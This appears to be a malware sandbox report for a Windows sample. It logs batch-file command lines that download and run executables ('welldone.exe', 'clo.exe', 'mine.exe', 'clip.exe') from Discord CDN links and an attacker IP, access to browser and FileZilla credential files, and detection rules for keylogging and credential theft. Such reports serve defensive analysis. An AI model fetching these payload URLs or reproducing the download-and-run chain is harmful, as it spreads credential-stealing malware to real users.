Category | Machine | Started | Completed |
---|---|---|---|
FILE | s1_win7_x6402 | July 31, 2021, 1:26 p.m. | July 31, 2021, 1:59 p.m. |
-
-
-
cmd.exe "C:\Windows\system32\cmd.exe" /c "C:\Users\test22\AppData\Local\Temp\AD71.tmp\AD82.tmp\AD92.bat C:\Users\test22\AppData\Local\Temp\mine.exe"
2692-
extd.exe C:\Users\test22\AppData\Local\Temp\AD71.tmp\AD82.tmp\extd.exe "/hideself" "" "" "" "" "" "" "" ""
2876 -
extd.exe C:\Users\test22\AppData\Local\Temp\AD71.tmp\AD82.tmp\extd.exe "/random" "90000009" "" "" "" "" "" "" ""
2984 -
extd.exe C:\Users\test22\AppData\Local\Temp\AD71.tmp\AD82.tmp\extd.exe "/download" "https://cdn.discordapp.com/attachments/868908533897363470/870626065511501945/welldone.exe" "welldone.exe" "" "" "" "" "" ""
3064 -
welldone.exe welldone.exe
2360 -
extd.exe C:\Users\test22\AppData\Local\Temp\AD71.tmp\AD82.tmp\extd.exe "/sleep" "900000" "" "" "" "" "" "" ""
1164
-
-
-
-
cmd.exe "C:\Windows\system32\cmd.exe" /c "C:\Users\test22\AppData\Local\Temp\AF46.tmp\AF56.tmp\AF57.bat C:\Users\test22\AppData\Local\Temp\clip.exe"
2712-
extd.exe C:\Users\test22\AppData\Local\Temp\AF46.tmp\AF56.tmp\extd.exe "/hideself" "" "" "" "" "" "" "" ""
2908 -
extd.exe C:\Users\test22\AppData\Local\Temp\AF46.tmp\AF56.tmp\extd.exe "/random" "90000009" "" "" "" "" "" "" ""
2964 -
extd.exe C:\Users\test22\AppData\Local\Temp\AF46.tmp\AF56.tmp\extd.exe "/download" "https://cdn.discordapp.com/attachments/868908533897363470/870626071547097128/clo.exe" "clo.exe" "" "" "" "" "" ""
1716 -
-
clo.exe C:\Users\test22\AppData\Local\Temp\2741\clo.exe
2472
-
-
extd.exe C:\Users\test22\AppData\Local\Temp\AF46.tmp\AF56.tmp\extd.exe "/sleep" "900000" "" "" "" "" "" "" ""
2484
-
-
-
Name | Response | Post-Analysis Lookup |
---|---|---|
ocsp.digicert.com |
CNAME
cs9.wac.phicdn.net
|
117.18.237.29 |
api.ip.sb | 104.26.13.31 | |
cdn.discordapp.com | 162.159.129.233 |
Suricata Alerts
Suricata TLS
Flow | Issuer | Subject | Fingerprint |
---|---|---|---|
TLSv1 192.168.56.102:49163 172.67.75.172:443 |
C=US, O=Cloudflare, Inc., CN=Cloudflare Inc ECC CA-3 | C=US, ST=CA, L=San Francisco, O=Cloudflare, Inc., CN=sni.cloudflaressl.com | 5e:7d:19:2d:d7:66:0c:63:45:a5:24:8f:b7:db:35:a7:61:6d:89:0e |
TLS 1.2 192.168.56.102:49190 162.159.130.233:443 |
C=US, O=Cloudflare, Inc., CN=Cloudflare Inc ECC CA-3 | C=US, ST=CA, L=San Francisco, O=Cloudflare, Inc., CN=sni.cloudflaressl.com | 54:e1:a7:9d:cc:c8:60:86:f1:a5:da:74:0e:5a:ab:45:df:37:8a:78 |
TLS 1.2 192.168.56.102:49189 162.159.129.233:443 |
C=US, O=Cloudflare, Inc., CN=Cloudflare Inc ECC CA-3 | C=US, ST=CA, L=San Francisco, O=Cloudflare, Inc., CN=sni.cloudflaressl.com | 54:e1:a7:9d:cc:c8:60:86:f1:a5:da:74:0e:5a:ab:45:df:37:8a:78 |
registry | HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography\MachineGuid |
file | C:\Program Files (x86)\Google\Chrome\Application\chrome.exe |
registry | HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\Google Chrome |
suspicious_features | GET method with no useragent header, Connection to IP address | suspicious_request | GET http://45.137.190.166/mine.exe | ||||||
suspicious_features | GET method with no useragent header, Connection to IP address | suspicious_request | GET http://45.137.190.166/clip.exe | ||||||
suspicious_features | GET method with no useragent header | suspicious_request | GET https://api.ip.sb/geoip | ||||||
suspicious_features | GET method with no useragent header | suspicious_request | GET https://cdn.discordapp.com/attachments/868908533897363470/870626065511501945/welldone.exe | ||||||
suspicious_features | GET method with no useragent header | suspicious_request | GET https://cdn.discordapp.com/attachments/868908533897363470/870626071547097128/clo.exe |
request | GET http://45.137.190.166/mine.exe |
request | GET http://45.137.190.166/clip.exe |
request | GET http://ocsp.digicert.com/MFEwTzBNMEswSTAJBgUrDgMCGgUABBTBL0V27RVZ7LBduom%2FnYB45SPUEwQU5Z1ZMIJHWMys%2BghUNoZ7OrUETfACEAo3h2ReX7SMIk79G%2B0UDDw%3D |
request | GET https://api.ip.sb/geoip |
request | GET https://cdn.discordapp.com/attachments/868908533897363470/870626065511501945/welldone.exe |
request | GET https://cdn.discordapp.com/attachments/868908533897363470/870626071547097128/clo.exe |
file | C:\Users\test22\AppData\Local\Google\Chrome\User Data\Local State |
file | C:\Users\test22\AppData\Local\Google\Chrome\User Data\Default\Web Data |
file | C:\Users\test22\AppData\Local\Google\Chrome\User Data\Default\Login Data |
file | C:\Users\test22\AppData\Local\Google\Chrome\User Data\Default\Cookies |
file | C:\Users\test22\AppData\Local\Temp\AD71.tmp\AD82.tmp\extd.exe |
file | C:\Users\test22\AppData\Local\Temp\mine.exe |
file | C:\Users\test22\AppData\Local\Temp\2741\clo.exe |
file | C:\Users\test22\AppData\Local\Temp\2741\welldone.exe |
file | C:\Users\test22\AppData\Local\Temp\AF46.tmp\AF56.tmp\extd.exe |
file | C:\Users\test22\AppData\Local\Temp\AD71.tmp\AD82.tmp\AD92.bat |
file | C:\Users\test22\AppData\Local\Temp\clip.exe |
file | C:\Users\test22\AppData\Local\Temp\AF46.tmp\AF56.tmp\AF57.bat |
cmdline | "C:\Windows\system32\cmd.exe" /c "C:\Users\test22\AppData\Local\Temp\AD71.tmp\AD82.tmp\AD92.bat C:\Users\test22\AppData\Local\Temp\mine.exe" |
cmdline | "C:\Windows\system32\cmd.exe" /c "C:\Users\test22\AppData\Local\Temp\AF46.tmp\AF56.tmp\AF57.bat C:\Users\test22\AppData\Local\Temp\clip.exe" |
file | C:\Users\test22\AppData\Local\Temp\mine.exe |
file | C:\Users\test22\AppData\Local\Temp\clip.exe |
file | C:\Users\test22\AppData\Local\Temp\AD71.tmp\AD82.tmp\extd.exe |
file | C:\Users\test22\AppData\Local\Temp\2741\welldone.exe |
file | C:\Users\test22\AppData\Local\Temp\2741\clo.exe |
file | C:\Users\test22\AppData\Local\Temp\2741\clo.exe |
description | Communication using DGA | rule | Network_DGA | ||||||
description | Communications use DNS | rule | Network_DNS | ||||||
description | Communications over RAW Socket | rule | Network_TCP_Socket | ||||||
description | Create a windows service | rule | Create_Service | ||||||
description | Record Audio | rule | Sniff_Audio | ||||||
description | Escalate priviledges | rule | Escalate_priviledges | ||||||
description | Run a KeyLogger | rule | KeyLogger | ||||||
description | Code injection with CreateRemoteThread in a remote process | rule | Code_injection | ||||||
description | Communications over HTTP | rule | Network_HTTP | ||||||
description | Match Windows Inet API call | rule | Str_Win32_Internet_API | ||||||
description | Communications over FTP | rule | Network_FTP | ||||||
description | Take ScreenShot | rule | ScreenShot | ||||||
description | Match Windows Http API call | rule | Str_Win32_Http_API | ||||||
description | Steal credential | rule | local_credential_Steal | ||||||
description | File Downloader | rule | Network_Downloader | ||||||
description | Communications over P2P network | rule | Network_P2P_Win | ||||||
description | (no description) | rule | DebuggerCheck__GlobalFlags | ||||||
description | (no description) | rule | DebuggerCheck__QueryInfo | ||||||
description | (no description) | rule | DebuggerCheck__RemoteAPI | ||||||
description | (no description) | rule | DebuggerHiding__Thread | ||||||
description | (no description) | rule | DebuggerHiding__Active | ||||||
description | (no description) | rule | DebuggerException__ConsoleCtrl | ||||||
description | (no description) | rule | DebuggerException__SetConsoleCtrl | ||||||
description | (no description) | rule | ThreadControl__Context | ||||||
description | (no description) | rule | SEH__vectored | ||||||
description | (no description) | rule | Check_Dlls | ||||||
description | Checks if being debugged | rule | anti_dbg | ||||||
description | Anti-Sandbox checks for ThreatExpert | rule | antisb_threatExpert | ||||||
description | Bypass DEP | rule | disable_dep | ||||||
description | Affect hook table | rule | win_hook | ||||||
description | Communication using DGA | rule | Network_DGA | ||||||
description | Communications use DNS | rule | Network_DNS | ||||||
description | Communications over RAW Socket | rule | Network_TCP_Socket | ||||||
description | Create a windows service | rule | Create_Service | ||||||
description | Record Audio | rule | Sniff_Audio | ||||||
description | Escalate priviledges | rule | Escalate_priviledges | ||||||
description | Run a KeyLogger | rule | KeyLogger | ||||||
description | Code injection with CreateRemoteThread in a remote process | rule | Code_injection | ||||||
description | Communications over HTTP | rule | Network_HTTP | ||||||
description | Match Windows Inet API call | rule | Str_Win32_Internet_API | ||||||
description | Communications over FTP | rule | Network_FTP | ||||||
description | Take ScreenShot | rule | ScreenShot | ||||||
description | Match Windows Http API call | rule | Str_Win32_Http_API | ||||||
description | Steal credential | rule | local_credential_Steal | ||||||
description | File Downloader | rule | Network_Downloader | ||||||
description | Communications over P2P network | rule | Network_P2P_Win | ||||||
description | Communications PWS network | rule | PWS_CnC_memory_Zero | ||||||
description | (no description) | rule | DebuggerCheck__GlobalFlags | ||||||
description | (no description) | rule | DebuggerCheck__QueryInfo | ||||||
description | (no description) | rule | DebuggerCheck__RemoteAPI |
cmdline | "C:\Windows\system32\cmd.exe" /c "C:\Users\test22\AppData\Local\Temp\AD71.tmp\AD82.tmp\AD92.bat C:\Users\test22\AppData\Local\Temp\mine.exe" |
cmdline | "C:\Windows\system32\cmd.exe" /c "C:\Users\test22\AppData\Local\Temp\AF46.tmp\AF56.tmp\AF57.bat C:\Users\test22\AppData\Local\Temp\clip.exe" |
host | 45.137.190.166 | |||
host | 95.217.159.87 |
file | C:\Users\test22\AppData\Local\Temp\2741\call:extd |
file | C:\Users\test22\AppData\Local\Temp\goto:eof |
file | C:\Users\test22\AppData\Local\Temp\call:extd |
file | C:\Users\test22\AppData\Local\Temp\2741\goto:eof |
file | C:\Users\test22\AppData\Local\Temp\AD71.tmp |
file | C:\Users\test22\AppData\Local\Temp\AD71.tmp\AD82.tmp |
file | C:\Users\test22\AppData\Roaming\FileZilla\sitemanager.xml |
file | C:\Users\test22\AppData\Roaming\FileZilla\recentservers.xml |